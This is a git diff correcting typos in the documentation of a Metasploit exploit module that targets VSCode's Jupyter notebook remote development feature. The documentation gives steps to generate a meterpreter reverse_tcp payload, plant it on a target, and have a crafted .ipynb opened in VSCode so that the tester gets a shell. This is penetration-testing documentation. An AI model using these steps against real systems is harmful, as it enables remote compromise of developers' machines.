diff --git a/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md b/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md index adbb70bbed6a..dfd2813a8f93 100644 --- a/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md +++ b/documentation/modules/exploit/multi/misc/vscode_ipynb_remote_dev_exec.md @@ -37,7 +37,7 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable 1. Start msfconsole 1. Do: `use linux/x64/meterpreter/reverse_tcp` 1. Do: `set lhost [ip]` and `set lport [port]` -1. Do: `geneate -o shell.sh -f elf` +1. Do: `generate -o shell.sh -f elf` 1. Copy the payload `shell.sh` to `/tmp/` on the target and run `chmod +x /tmp/shell.sh` 1. Do: `use modules/exploits/multi/misc/vscode_ipynb_remote_dev_exec` 1. Do: `set target 1 ` @@ -45,8 +45,8 @@ https://update.code.visualstudio.com/1.70.2/linux-deb-x64/stable 1. Do: `set FETCH_WRITABLE_DIR /tmp/` 1. Do: `set PAYLOAD_FILENAME shell.sh` 1. Do: `run` -1. Copy the ipynd payload file to the target machine. -1. In VSCode, open the URL (File -> Open -> project.ipynb) +1. Copy the ipynb, and payload file to the target machine. +1. In VSCode, open the file (File -> Open -> project.ipynb) 1. After the pop-up errors, open the file again. 1. You should get a shell.